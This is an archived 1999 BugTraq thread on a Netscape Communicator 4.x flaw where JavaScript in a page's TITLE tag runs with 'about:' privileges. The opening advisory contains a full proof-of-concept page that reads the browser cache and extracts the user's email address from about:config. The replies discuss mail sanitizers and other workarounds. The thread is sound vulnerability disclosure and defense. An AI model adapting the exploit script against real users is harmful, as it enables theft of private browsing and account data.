Date: Mon, 24 May 1999 14:24:13 +0300 From: Georgi Guninski To: BUGTRAQ@netspace.org Subject: Netscape Communicator JavaScript in security vulnerability There is a security bug in Netscape Communicator 4.6 Win95, 4.07 Linux (guess all 4.x versions are affected) in the way they treat JavaScript code in the title of the document. One may embed JavaScript code in the <TITLE> tag. If the info about the document is shown, then the JavaScript code is executed. The info about the document may be infoked by a script using 'location="wysiwyg://1/about:document" '. The problem is that the JavaScript code is executed in the security context of the "about:" protocol. This allows accessing documents in the "about:" protocol such as: "about:cache", "about:config", "about:global", etc. Vulnerabilities: * Reading user's cache and accessing information such as passwords, credit card numbers. * Reading info about the Netscape's configuration ("about:config"). This includes finding user's email address, mail servers, the encoded mail password (it must me saved and may be decoded). This allows reading user's email. The more dangerous part is that this vulnerability MAY BE EXPLOITED USING HTML MAIL MESSAGE. Workaround: Disable JavaScript Demonstration is available at: http://www.nat.bg/~joro/titlecache.html Georgi Guninski http://www.nat.bg/~joro http://www.whitehats.com/guninski ---------------------------------------------------------------------------------------- <http://www.nat.bg/~joro/titlecache.html> <HTML> <HEAD> <TITLE> <SCRIPT> a=window.open('wysiwyg://1/about:cache'); s='Here are some links in your cache: \n'; for(i=0;i<7;i++) s += a.document.links[i] + '\n'; a.close(); alert(s); a=window.open('wysiwyg://1/about:config'); mag='mail.identity.useremail = '; mend='general.title_tips'; res=mag; charstoread=20; alert('Will try to find your email. May take some time.'); function readit() { for(i=0;i<charstoread;i++) { t=res; a.find(mend); for(c=1;c<256;c++) { t=res + String.fromCharCode(c); if (a.find(t,true,true)) { /* alert(c); */ res=t; } } } res=res.substring(mag.length); a.close(); alert("Your email is :\n" + res); } setTimeout("readit()",3000); </SCRIPT> There is a security bug in Netscape Communicator 4.6 Win95, 4.07 Linux (guess all 4.x versions are affected) in the way they treat JavaScript code in the title of the document.

One may embed JavaScript code in the TITLE tag. If the info about the document
is shown, then the JavaScript code is executed. The info about the document may be infoked by a script using 'location="wysiwyg://1/about:document" '.

The problem is that the JavaScript code is executed in the security context of the "about:" protocol. This allows accessing documents in the "about:" protocol such as: "about:cache", "about:config", "about:global", etc.

Vulnerabilities:
 * Reading user's cache and accessing information such as passwords, credit card numbers.
 * Reading info about the Netscape's configuration ("about:config"). This includes  finding user's email address, mail servers, the encoded mail password   (it must me saved and may be decoded). This allows reading user's email.
The more dangerous part is that this vulnerability MAY BE EXPLOITED USING HTML MAIL MESSAGE.

Workaround: Disable JavaScript
Go to Georgi Guninski's home page

---------------------------------------------------------------------------------------- Date: Mon, 24 May 1999 10:23:06 -0700 From: John D. Hardin To: BUGTRAQ@netspace.org Subject: Re: Netscape Communicator JavaScript in security vulnerability On Mon, 24 May 1999, Georgi Guninski wrote: > Vulnerabilities: > * Reading user's cache and accessing information such as passwords, > credit card numbers. > * Reading info about the Netscape's configuration ("about:config"). > This includes finding user's email address, mail servers, the > encoded mail password (it must me saved and may be decoded). This > allows reading user's email. > > The more dangerous part is that this vulnerability MAY BE EXPLOITED > USING HTML MAIL MESSAGE. ...unless you're sanitizing your email. Anybody using an HTML-enabled mail client should at least be aware of the availability of this tool: ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html -- John Hardin KA7OHZ jhardin@wolfenet.com pgpk -a finger://gonzo.wolfenet.com/jhardin PGP key ID: 0x41EA94F5 PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76 ----------------------------------------------------------------------- In the Lion the Mighty Lion the Zebra sleeps tonight... Dee de-ee-ee-ee-ee de de de we um umma way! ----------------------------------------------------------------------- 9 days until Crusade: the Babylon Project ---------------------------------------------------------------------------------------- Date: Tue, 25 May 1999 12:30:52 -0600 From: Brett Glass <brett@LARIAT.ORG> To: BUGTRAQ@netspace.org Subject: Re: Netscape Communicator JavaScript in <TITLE> security vulnerability John's recipes are great tools; we recommend them. Only one problem: Procmail does not work on NetNews. (If this exploit works in mail it almost certainly works in news.... Scary thought.) --Brett Glass At 10:23 AM 5/24/99 -0700, John D. Hardin wrote: >On Mon, 24 May 1999, Georgi Guninski wrote: > > > Vulnerabilities: > > * Reading user's cache and accessing information such as passwords, > > credit card numbers. > > * Reading info about the Netscape's configuration ("about:config"). > > This includes finding user's email address, mail servers, the > > encoded mail password (it must me saved and may be decoded). This > > allows reading user's email. > > > > The more dangerous part is that this vulnerability MAY BE EXPLOITED > > USING HTML MAIL MESSAGE. > >...unless you're sanitizing your email. Anybody using an HTML-enabled >mail client should at least be aware of the availability of this tool: > > ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html > >-- > John Hardin KA7OHZ jhardin@wolfenet.com > pgpk -a finger://gonzo.wolfenet.com/jhardin PGP key ID: 0x41EA94F5 > PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76 >----------------------------------------------------------------------- > In the Lion > the Mighty Lion > the Zebra sleeps tonight... > Dee de-ee-ee-ee-ee de de de we um umma way! >----------------------------------------------------------------------- > 9 days until Crusade: the Babylon Project ---------------------------------------------------------------------------------------- Date: Tue, 25 May 1999 21:40:43 -0400 From: Forrest J. Cavalier III <mibsoft@mibsoftware.com> To: BUGTRAQ@netspace.org Subject: Re: Netscape Communicator JavaScript in <TITLE> security > John's recipes are great tools; we recommend them. Only one problem: > Procmail does not work on NetNews. (If this exploit works in mail it > almost certainly works in news.... Scary thought.) > > --Brett Glass > I don't know if the exploit works with Usenet messages, but decent Usenet servers have filtering capabilities. INN had perl filtering hooks since at least 1995, and had easily modified code to analyze and reject messages based on headers since the beginning (1993.) In Usenet, generally most sites do not modify and sanitize messages, they just drop and reject them with just a message to the log, nothing else. Since propagating modified messages, for whatever reason, is never acceptable, it becomes a problem to sanitize: it would mean keeping additional special copies around. A full Usenet feed is on the order of 1E6 messages per day, and nearly all are binaries (UUEncoded) The John D. Hardin code looks solid, but might bog down a server if every Usenet message had to go through it. Personally, I don't think HTML (or binaries) belong on Usenet in the first place, so it's a simple policy to just drop posts containing HTML or UUencoding. :-) Seriously, the Hardin perl code will drop pretty easily into INN, although I haven't tried it myself. See README.perl_hook in the INN distribution and modify the procmail selector lines to the appropriate perl instead, and return a reject code instead of mangling and rewriting. Forrest J. Cavalier III, Mib Software, INN customization and consulting 'Pay-as-you-go' commercial support for INN: Only $64/hour! Searchable hypertext INN docs, FAQ, RFCs, etc: 650+ pages: http://www.mibsoftware.com/innsup.htm ---------------------------------------------------------------------------------------- Date: Tue, 25 May 1999 22:32:25 -0400 From: Usman <akeju00@IONAPREP.ORG> To: BUGTRAQ@netspace.org Subject: Re: Netscape Communicator JavaScript in <TITLE> securityvulnerability "John D. Hardin" wrote: > > On Mon, 24 May 1999, Georgi Guninski wrote: >>snip!<< > > The more dangerous part is that this vulnerability MAY BE EXPLOITED > > USING HTML MAIL MESSAGE. > > ...unless you're sanitizing your email. Anybody using an HTML-enabled > mail client should at least be aware of the availability of this tool: > > ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html > > -- > John Hardin KA7OHZ jhardin@wolfenet.com Or, just to add the said workaround, if you're only worried about email, Netscape 4.5+ users can just disable JavaScript for Mail and News without disabling JavaScript altoghether. I know there's still the meta refresh factor for HTML-enabled mail clients, though. It would be, IMHO, a good idea for Netscape to add a little "Disable/Enable HTML for Mail Messages" checkbox, don't you think? -Usman Akeju ---------------------------------------------------------------------------------------- Date: Sat, 12 Jun 1999 22:58:26 -0700 From: John D. Hardin <jhardin@WOLFENET.COM> To: BUGTRAQ@netspace.org Subject: Re: Netscape Communicator JavaScript in <TITLE> security On Thu, 27 May 1999, Aleph One wrote: > That doesn't really cut it. You can embed JavaScript into things > linke onClick, onLoad, etc. You need to kill all those as well. Thanks for pointing that out. I've updated the sanitizer to defang the event handlers explicitly, which saves blocking the <BODY> and <TITLE> tags themselves, and also protects links. The current release of the sanitizer is 1.84 and it is available at ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html -- John Hardin KA7OHZ jhardin@wolfenet.com pgpk -a finger://gonzo.wolfenet.com/jhardin PGP key ID: 0x41EA94F5 PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76 ----------------------------------------------------------------------- Efficiency can magnify good, but it magnifies evil just as well. So, we should not be surprised to find that modern electronic communication magnifies stupidity as *efficiently* as it magnifies intelligence. -- Robert A. Matern ----------------------------------------------------------------------- 89 days until 9/9/99